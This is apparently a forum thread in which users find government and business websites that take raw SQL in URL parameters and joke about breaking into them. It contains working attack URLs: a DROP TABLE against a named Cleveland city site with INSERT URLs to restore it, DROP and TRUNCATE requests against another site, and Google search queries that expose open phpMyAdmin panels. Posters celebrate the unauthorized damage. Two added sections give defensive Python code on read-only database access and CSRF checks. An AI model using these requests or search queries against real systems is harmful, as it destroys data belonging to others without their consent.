SQL injection madness



  • The following Google query returns some fantastic results (thousands of them):

     inurl:select inurl:where inurl:%20



  • Wow! I hope Bobby Tables doesn't visit any of those websites.



  • Bah! I've entirely failed to drop any tables at all.

    Not that I tried, of course.

    I *especially* didn't try on the United Nations homepage.



  • Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]User does not have permission to perform this operation on table 'Restaurantes'.

    /Gastronomia/RestaurantesI.asp, line 204


    I think the problem is that all the sites vulnerable enough to be fun have already been entirely destroyed by the many and varied evils of the internet.


  •  Shit shit shit, though I hate to admit it, I dropped a table on the city of Cleveland's website.

    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=SELECT+Ward%2C+PPN%2C+Street_Number%2C+Street_Name%2C+Frontage_of_Parcel%2C+Depth_of_Parcel%2C+Sqfeet++++%0D%0AFROM+cityport%0D%0AWHERE+Buildescr+%3D+'Non-Buildable'+and+Ward+in+(12%2C+13%2C+14%2C+15%2C+16%2C+17%2C+18%2C+19%2C+20%2C+21)&sql_order=+order+by+'Ward'+ASC&pos=120

    turned into

    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=DROP TABLE cityport

    Am I going to jail now? Maybe I can find a google cache of the database and manually restore it.

    WHO USES sql_querys in the URL and FURTHERMORE who the hell gives that user FULL DATABASE ACCESS, why not just read on certain tables.

    The sad AND scary thing is that most of the results I get from that google search are for GOVERNMENT websites. Who the hell are they contracting to do their web work?



  • You've got to be kidding me.


    Stumbled onto this gem too..

    http://cd.city.cleveland.oh.us/scripts/LandbankReports.05232007 



  • You know, I thought you must be joking or something at first, until I went to that site myself and did a search on all records, and it didn't turn up anything. Wow.


    Way to go, random Cleveland site.  You have the worst security I've seen in my life, and have just paid for it.  Do a better job next time.



  • @Bladezor said:

    The sad AND scary thing is that most of the results I get from that google search are for GOVERNMENT websites. Who the hell are they contracting to do their web work?

    The lowest bidder. Enough said.




  • Ok, I did what I could to "restore" their database.


    Recreate the table:

    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&sql_query=CREATE TABLE landbank.cityport (Ward TEXT NOT NULL, PPN TEXT NOT NULL ,Street_Number TEXT NOT NULL, Street_Name TEXT NOT NULL, Frontage_of_Parcel TEXT NOT NULL, Depth_of_Parcel TEXT NOT NULL, Sqfeet TEXT NOT NULL, Buildescr TEXT NOT NULL)

    Populate it:

    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("18","00515009","3091","W%20106TH%20ST","25","105","2625","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01919053","0","WANDA%20AVE","40","112","4480","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01917012","0","BELLAIRE%20RD","64","65","4160","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01917011","0","BELLAIRE%20RD","40","99","3960","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01916150","0","LEEILA%20AVE","40","111","4440","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01916149","0","LEEILA%20AVE","40","111","4440","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01826053","0","BROOKLAWN%20AVE","297","73","21681","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01826052","0","BROOKLAWN%20AVE","71","52","3692","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225081","0","VICTORY%20BLVD","61","89","5429","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225080","0","VICTORY%20BLVD","62","110","6820","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225079","0","VICTORY%20BLVD","68","119","8092","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225034","0","W%20140%20ST","21","232","4872","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225078","0","VICTORY%20BLVD","60","113","6780","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02010091","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009088","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009087","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009086","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009085","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009084","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009083","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009082","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009081","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009080","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009079","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")

    Good enough..?



  • Ugh, one of you guys dropped the table again..I'm not fixing it again..



  • http://www.websahara.de/query.php?query=select+[snip]+from+land%2C+bild+where+[snip]&start=20&showrow=5 

    You can abuse this to show more records, but when you try to DROP the table with

    http://www.websahara.de/query.php?query=DROP+TABLE+land+%2c+bild&start=0&showrow=5

    you will get:

    hahaha



  • @bobday said:

    http://www.websahara.de/query.php?query=select+[snip]+from+land%2C+bild+where+[snip]&start=20&showrow=5 

    You can abuse this to show more records, but when you try to DROP the table with

    http://www.websahara.de/query.php?query=DROP+TABLE+land+%2c+bild&start=0&showrow=5

    you will get: 


    It's just searching for some substrings like delete or drop, but it appears security is enforced properly:

    http://www.websahara.de/query.php?query=truncate%20table+land

    It didn't catch the query, but you get an

    Access denied for user: 'websahara@localhost' to database 'websahara'
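
Two observations in this thread point at the same design question: Bladezor asked why the Cleveland script's database user had full access instead of read rights on a few tables, and the post above notes that websahara's substring check missed TRUNCATE while the database login itself refused it. A text filter reasons about what a statement says; a privilege grant reasons about what it can do, and only the second one holds when the filter's word list is incomplete. The code below is an added example of mine, not code from the thread or from any site it names. It uses Python's sqlite3 authorizer as a stand-in for a SELECT-only database account, a constructed two-column table, and an assumed blocklist of just "drop" and "delete" (the post does not give the real list), and closes with the parameterised query shape that makes the filter unnecessary in the first place.

```python
import sqlite3

# Constructed sample schema; it only stands in for the tables named in the thread.
SCHEMA = """
CREATE TABLE land (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
INSERT INTO land (name) VALUES ('Alpha'), ('Beta'), ('Gamma');
"""

# Assumed blocklist; the websahara post only says "substrings like delete or drop".
BLOCKED_WORDS = ("drop", "delete")


def naive_filter_allows(query: str) -> bool:
    """True when the substring blocklist would let `query` through.

    This is the weak control from the thread: it reasons about the text of a
    statement, not about what the statement does, so any verb that is not on
    the list (TRUNCATE, UPDATE, ALTER, ...) is waved through.
    """
    lowered = query.lower()
    return not any(word in lowered for word in BLOCKED_WORDS)


def read_only_authorizer(action, arg1, arg2, db_name, trigger_or_view):
    """SQLite authorizer callback standing in for a database account that holds
    only SELECT privileges: every non-read action is refused when the statement
    is compiled, whatever an application-layer filter thought of its text."""
    reads = {sqlite3.SQLITE_SELECT, sqlite3.SQLITE_READ, sqlite3.SQLITE_FUNCTION}
    return sqlite3.SQLITE_OK if action in reads else sqlite3.SQLITE_DENY


def make_db() -> sqlite3.Connection:
    """Build the sample database with full rights, then hand back a connection
    restricted to reads, the way a web app should get a low-privilege DB login."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.set_authorizer(read_only_authorizer)
    return conn


def run_raw(conn: sqlite3.Connection, query: str):
    """Execute caller-supplied SQL (the sql.php / query.php design) on the
    read-only connection. Returns ("ok", rows) or ("denied", message)."""
    try:
        return ("ok", conn.execute(query).fetchall())
    except sqlite3.DatabaseError as exc:  # SQLITE_AUTH surfaces as DatabaseError
        return ("denied", str(exc))


def search_land(conn: sqlite3.Connection, name_prefix: str, limit: int):
    """The hardened design: the statement shape is fixed in code and the user
    supplies values only, passed as bound parameters so they can never be SQL."""
    # Escape LIKE metacharacters so a prefix such as "%" cannot widen the match.
    escaped = (name_prefix.replace("\\", "\\\\")
               .replace("%", "\\%")
               .replace("_", "\\_"))
    return conn.execute(
        "SELECT id, name FROM land WHERE name LIKE ? ESCAPE '\\' ORDER BY id LIMIT ?",
        (escaped + "%", int(limit)),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("blocklist lets TRUNCATE through:", naive_filter_allows("TRUNCATE TABLE land"))
    print("read-only login on UPDATE:", run_raw(db, "UPDATE land SET name = 'x'"))
    print("read-only login on SELECT:", run_raw(db, "SELECT count(*) FROM land"))
    print("parameterised search:", search_land(db, "A", 10))
```

Run it and the blocklist waves TRUNCATE through, while the read-only connection refuses an UPDATE or DROP when the statement is compiled, before anything executes. That is the "Access denied for user" behaviour the post saw, and it is the control to rely on; the blocklist is at best a courtesy. `search_land` is the shape that removes the need for either: the application never hands the database a statement it did not write itself.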



  • I just noticed this page in the search results:

    http://www.sleep-in.ch/suchergebnis_gast.php?zoneid=10&katid=&minpers=&lang=d&Anfangsposition=40&abfrage=SELECT+i_id%2Ci_name%2Ci_vorname%2Ccb.bez+as+cod_bez%2Csubstring(value%2C1%2C20)+as+l_value%2Ci_max_personen%2Ci_zeitraum_von%2Ci_zeitraum_bis%2C+zb.bezeichnung+as+z_bez%2Ci_bemerkung%2CUNIX_TIMESTAMP(i_mutiert_am)+as+mutdat%0D%0A+++++++++++++FROM+inserate%2C+codes+co%2C+codebez+cb%2C+countries+c%2C+zonen+z%2C+zonenbez+zb%0D%0A++++++++++++where+i_rubrik_cod_id+%3D+100%0D%0A++++++++++++++and+i_typ_cod_id+%3D+200%0D%0A++++++++++++++and+i_status_cod_id+%3D+900%0D%0A++++++++++++++and+i_kat_cod_id+%3D+co.cod_id%0D%0A++++++++++++++and+co.cod_id+%3D+cb.cod_id%0D%0A++++++++++++++and+cb.spr_id+%3D+'d'+%0D%0A++++++++++++++and+i_land+%3D+c.id+%0D%0A++++++++++++++and+i_z_id+%3D+z.z_id%0D%0A++++++++++++++and+z.z_id+%3D+zb.z_id%0D%0A++++++++++++++and+zb.spr_id+%3D+'d'+and+i_z_id+in+('3'%2C'11'%2C'12'%2C'13')+order+by+cod_bez%2C+UNIX_TIMESTAMP(i_mutiert_am)+desc+&PHPSESSID=3b40f967208e224666840320c4a51273

    and now I remember having read about that site in the local newspapers a few days ago. They were reported to have lost records last Friday, and the operators restored to the last backup. Shall I help them test their backup/restore procedure once again?  :-) 




  •  BTW, this is what they report under "Aktuell" == "news":

    In der Nacht vom Sonntag, 20. April auf Montag 21. April 2008 wurde sleep-in.ch Opfer eines Hacker-Angriffs.

    Dabei wurden alle Angebote der über 2800 Gastgeber und Gäste gezielt gelöscht. Sleep-In konnte mit wenigen Ausnahmen alle Inserate wiederherstellen (Stand Sonntag Morgen). Sleep-In entschuldigt sich bei seinen Gastgeber und Gästen und arbeitet mit Hochdruck daran, dass sich dieser Vorfall nicht wiederholen kann.

    Aber natürlich sind wir verärgert und enttäuscht.

    Trotzdem: Auf eine gfreute Euro08!

    Translates to

    During the night of Sunday, April 20 to Monday, April 21, sleep-in.ch became the victim of a hacker attack.

    Thereby, all offers of more than 2800 hosts and guests have been deleted on purpose. Sleep-in was able to restore all ads with only a few exceptions (status as of Sunday morning). Sleep-In is apologizing to all hosts and guests and is working with high pressure to not let this incident repeat itself.

    But of course, we are angry and disappointed.

    Still: Enjoy a happy Euro08! 

    Now, what do we say!



  • @TheRider said:

     BTW, this is what they report under "Aktuell" == "news":

    During the night of Sunday, April 20 to Monday, April 21, sleep-in.ch became the victim of a hacker attack.

    Thereby, all offers of more than 2800 hosts and guests have been deleted on purpose. Sleep-in was able to restore all ads with only a few exceptions (status as of Sunday morning). Sleep-In is apologizing to all hosts and guests and is working with high pressure to not let this incident repeat itself.

    But of course, we are angry and disappointed.

    Still: Enjoy a happy Euro08! 

    Now, what do we say!


    They only do nightly backups; people should delete their records in the evening.



  • " aah!! h4xx0rs!! "



  •  @Bladezor said:

    hate on Cleveland
    It's funny because they deserve it, being from Cleveland and all.



  • @Bladezor said:

    Ugh, one of you guys dropped the table again..I'm not fixing it again..
    I get the feeling that by the end of the day their database is going to be in a sad state of affairs.



  • @galgorah said:

    @Bladezor said:

    Ugh, one of you guys dropped the table again..I'm not fixing it again..
    I get the feeling that by the end of the day their database is going to be in a sad state of affairs.


    Bonus points if someone succeeds in executing rm -rf /var/backup :) 



  • @t-bone said:

    Bonus points prison rape if someone succeeds in executing rm -rf /var/backup :) 

    FTFY.



  • @belgariontheking said:

    Sig: To fill your mind with knowledge, we must start by emptying it


    That's really funny, considering the context of this thread. 



  • Looks like they took it offline, or someone dropped the database(s)



  • @Xiphonex said:

    Looks like they took it offline, or someone dropped the database(s)

    I guess I should have added earlier to my above post "Or it may not exist at all!"


  • @Bladezor said:

    Shit shit shit, though I hate to admit it, I dropped a table on the city of Cleveland's website.

    @Bladezor said:

    Ok, I did what I could to "restore" their database.

    @Bladezor said:

    Ugh, one of you guys dropped the table again..I'm not fixing it again..

    That is the funniest thing I have read in ages.  I thank you.

    mt



  • @mtill said:

    That is the funniest thing I have read in ages.  I thank you.

    I agree!  Never before have I seen someone use SQL injection to actually RESTORE someone's database.  The only thing better would be if they truly hacked this server and, instead of just destroying it, went ahead and patched all the security holes, defragmented the hard drive and emptied the trash. 



  • @Outlaw Programmer said:

    ...and emptied the trash. 

    But critical documents were stored there!



  • @TheRider said:

    http://www.sleep-in.ch/suchergebnis_gast.php?zoneid=10&katid=&minpers=&lang=d&Anfangsposition=40&abfrage=SELECT+i_id%2Ci_name%2Ci_vorname%2Ccb.bez+as+cod_bez%2Csubstring(value%2C1%2C20)+as+l_value%2Ci_max_personen%2Ci_zeitraum_von%2Ci_zeitraum_bis%2C+zb.bezeichnung+as+z_bez%2Ci_bemerkung%2CUNIX_TIMESTAMP(i_mutiert_am)+as+mutdat%0D%0A+++++++++++++FROM+inserate%2C+codes+co%2C+codebez+cb%2C+countries+c%2C+zonen+z%2C+zonenbez+zb%0D%0A++++++++++++where+i_rubrik_cod_id+%3D+100%0D%0A++++++++++++++and+i_typ_cod_id+%3D+200%0D%0A++++++++++++++and+i_status_cod_id+%3D+900%0D%0A++++++++++++++and+i_kat_cod_id+%3D+co.cod_id%0D%0A++++++++++++++and+co.cod_id+%3D+cb.cod_id%0D%0A++++++++++++++and+cb.spr_id+%3D+'d'+%0D%0A++++++++++++++and+i_land+%3D+c.id+%0D%0A++++++++++++++and+i_z_id+%3D+z.z_id%0D%0A++++++++++++++and+z.z_id+%3D+zb.z_id%0D%0A++++++++++++++and+zb.spr_id+%3D+'d'+and+i_z_id+in+('3'%2C'11'%2C'12'%2C'13')+order+by+cod_bez%2C+UNIX_TIMESTAMP(i_mutiert_am)+desc+&PHPSESSID=3b40f967208e224666840320c4a51273

    The Real WTF is that that's correctly indented. Oh, and \r\n newlines.




  • Man, like 4 in a row seem to be fakes or something. You can put anything in the query string and it still returns the same result. Also, a few phpMyAdmin pages here.
    @Carnildo said:

    @Outlaw Programmer said:

    ...and emptied the trash. 

    But critical documents were stored there!

    I lol'd.





  • @MasterPlanSoftware said:

     Nice going guys... but they are onto you!

    http://www.computerworld.com/action/article.do?command=printArticleBasic&articleId=9080678


    Wow, I wouldn't want to be the guy who tried an SQL injection attack on the UN right about now...



    *thinks...*

    Oh shit.



  • @rc_pinchey said:

    Wow, I wouldn't want to be the guy who tried an SQL injection attack on the UN right about now...

    *thinks...*

    Oh shit.

    Meh, the UN has no real power.  "In latest news, the UN security council has voted to send a firmly-worded letter to rc_pinchey for attempting to hack its database." 



  • SQL Injection is too much work.

    I prefer the ease and convenience of:

    http://www.google.com/search?q="at+end+of+table"+"next+autoindex"




  • @superjer said:

    SQL Injection is too much work.

    I prefer the ease and convenience of:

    http://www.google.com/search?q="at+end+of+table"+"next+autoindex"

    Wow.  Just Wow.



  • @superjer said:

    SQL Injection is too much work.

    I prefer the ease and convenience of:

    http://www.google.com/search?q="at+end+of+table"+"next+autoindex"


    I clicked on the very first Google result and -- there's a tab labelled "Drop".. That couldn't possibly do what I think it does -- could it?? I clicked on it, but just couldn't bring myself to click on "OK". All I can say is . . . . OH MY GOD!!!!

    http://www.zweg.com/dump/photo/holyshit.png



  • @Tuuli Mustasydan said:

    I clicked on the very first Google result and -- there's a tab labelled "Drop".. That couldn't possibly do what I think it does -- could it?? I clicked on it, but just couldn't bring myself to click on "OK". All I can say is . . . . OH MY GOD!!!!


    You're lying. I can't see any phpMyAdmin database there! 



  • Hypothetically, you could create crafty URLs, put them on the web somewhere, and let the Google spider do the "real" hacking. Hypothetically.



  • @Outlaw Programmer said:

    @mtill said:

    That is the funniest thing I have read in ages.  I thank you.

    I agree!  Never before have I seen someone use SQL injection to actually RESTORE someone's database.  The only thing better would be if they truly hacked this server and, instead of just destroying it, went ahead and patched all the security holes, defragmented the hard drive and emptied the trash. 


    Bah. Then they'd only expect us to fix all their problems from now on ...



  • Update: See also The Spider of Doom, if you forgot that story.



  • @MasterPlanSoftware said:

     Nice going guys... but they are onto you!

    http://www.computerworld.com/action/article.do?command=printArticleBasic&articleId=9080678


    The guestbook I attacked isn't back yet... I feel somewhat bad...

    At least it didn't belong to the UN.



  • @Bladezor said:

    Ugh, one of you guys dropped the table again..I'm not fixing it again..

    Actually, GoogleBot probably dropped the table for you. Just include the restore query in this thread too, and GoogleBot should get stuck in an infinite loop of destroying and recreating that table until the end of time.
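
Kyanar's guess is the Spider of Doom lesson: a crawler follows every link it can find, with no session of its own, so any state change reachable by a GET will sooner or later be triggered by a bot rather than a person. The dispatcher below is an added example of mine, not code from the thread or from any site it names. It assumes a small constructed in-memory parcel table and three hypothetical endpoints, and shows the request handling that closes this hole: parameters that carry statements are refused outright, GET and HEAD can only run one fixed, typed read, and anything that changes state requires a POST carrying a CSRF token bound to the caller's own session.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed sample rows, loosely shaped like the parcel columns in the thread's URLs.
PARCELS = [
    {"ward": 18, "ppn": "P-0001", "street": "SAMPLE ST", "sqfeet": 2625},
    {"ward": 19, "ppn": "P-0002", "street": "SAMPLE AVE", "sqfeet": 4480},
    {"ward": 20, "ppn": "P-0003", "street": "SAMPLE BLVD", "sqfeet": 5429},
]

SAFE_METHODS = {"GET", "HEAD"}  # what a crawler sends; these must never change state
# Parameter names that carry whole statements, taken from the URLs quoted in this thread.
STATEMENT_PARAMS = {"sql_query", "query", "abfrage"}

STATE = {"rebuilds": 0}  # mutable server state that a link in a forum post must not reach


class Session:
    """Minimal server-side session carrying a per-session CSRF token."""

    def __init__(self):
        self.csrf_token = secrets.token_urlsafe(32)


def search_parcels(ward: int):
    """The only thing a safe-method request may do: a fixed read with a typed value."""
    return [row for row in PARCELS if row["ward"] == ward]


def handle(method: str, url: str, session: Session, form=None):
    """Dispatch one request and return (status, payload)."""
    parts = urlsplit(url)
    params = {k: v[-1] for k, v in parse_qs(parts.query).items()}
    # 1. No endpoint accepts a statement as a parameter, whatever the method.
    if any(name in params for name in STATEMENT_PARAMS):
        return 400, "statements are not accepted as parameters"
    # 2. Safe methods get one fixed, parameterised read and nothing else.
    if parts.path == "/parcels" and method in SAFE_METHODS:
        try:
            ward = int(params.get("ward", ""))
        except ValueError:
            return 400, "ward must be an integer"
        return 200, search_parcels(ward)
    # 3. State changes need POST plus a token bound to the caller's own session.
    if parts.path == "/admin/rebuild":
        if method != "POST":
            return 405, "state changes require POST"
        token = (form or {}).get("csrf_token", "")
        if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
            return 403, "missing or wrong CSRF token"
        STATE["rebuilds"] += 1
        return 200, {"rebuilds": STATE["rebuilds"]}
    return 404, "no such endpoint"


def crawler_vs_admin_scenario():
    """Replay the requests a crawler would send (GETs on a fresh anonymous session)
    next to an admin's POST, and return the status codes in order."""
    STATE["rebuilds"] = 0
    bot, admin = Session(), Session()
    return [
        handle("GET", "/scripts/sql.php?db=landbank&sql_query=SELECT+1", bot)[0],
        handle("GET", "/parcels?ward=19", bot)[0],
        handle("GET", "/admin/rebuild", bot)[0],
        # a token copied from another session is useless on this one
        handle("POST", "/admin/rebuild", bot, {"csrf_token": admin.csrf_token})[0],
        handle("POST", "/admin/rebuild", admin, {"csrf_token": admin.csrf_token})[0],
    ]


if __name__ == "__main__":
    print(crawler_vs_admin_scenario(), STATE)
```

The scenario returns 400, 200, 405, 403 and then 200: the bot's GETs either serve a read or are refused, the token check rejects a POST that rides on the wrong session, and only the admin's own POST moves the counter. The order of the checks matters: the statement-parameter refusal comes first so that even a harmless-looking `SELECT 1` never reaches any handler, which is the property the `sql.php`-style endpoints in this thread lacked.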



  • @Kyanar said:

    @Bladezor said:
    Ugh, one of you guys dropped the table again..I'm not fixing it again..

    Actually, GoogleBot probably dropped the table for you. Just include the restore query in this thread too, and GoogleBot should get stuck in an infinite loop of destroying and recreating that table until the end of time.

    I don't think GoogleBot would add a table called "ThisIsFun" and a database called "Fubar" right before the whole thing was dropped.



  • I love how Microsoft's response is basically "it's not a bug in the software, but update anyway" and "it's an SQL injection exploit" without any attempt to explain what an SQL injection exploit is. People read "exploit", they assume the software (i.e. IIS) is responsible. The more tables drop, the more flak Microsoft takes for something that (for once) actually isn't their problem! Ha!



  • @lolwtf said:

    Even more daily drivel

    Thanks for pointing out the obvious!



  • @MasterPlanSoftware said:

    @lolwtf said:

    Even more daily drivel

    Thanks for pointing out the obvious!


    Has too much exposure to Swampy turned you into a troll? That seems a little uncalled-for...



  • @rc_pinchey said:

    That seems a little uncalled-for...

    Then go read our daily dose of 'lolwtf'. He has decided to post on every thread with nonsense. 

    Brilliant posts like "Really".

    So no, not uncalled for.



  • Flaming is always uncalled for.



  • @fbjon said:

    Flaming is always uncalled for.

    I happen to live in a state that allows homosexuals to marry one another?  Do you find that offensive, too?  You're no better than the people who wouldn't allow blacks to vote.  Well, except that blacks probably won't vote the right way.. 



  • @morbiuswilters said:

    @fbjon said:

    Flaming is always uncalled for.

    I happen to live in a state that allows homosexuals to marry one another?  Do you find that offensive, too?  You're no better than the people who wouldn't allow blacks to vote. 


    Yeah really, we don't need your kind around here. Take your hate and fear mongering elsewhere please.



  • @rc_pinchey said:

    @MasterPlanSoftware said:

    @lolwtf said:

    Even more daily drivel

    Thanks for pointing out the obvious!


    Has too much exposure to Swampy turned you into a troll? That seems a little uncalled-for...
    You're only noticing now that he's a troll?



  • @lolwtf said:

    You're only noticing now that he's a troll?


    More like an annoying hyperactive child. Just look at his post count. Close to mine, but he wrote almost all of them during the last 6 months. A good troll doesn't post that much. He drops a carefully crafted flamebait now and then and enjoys the fallout.

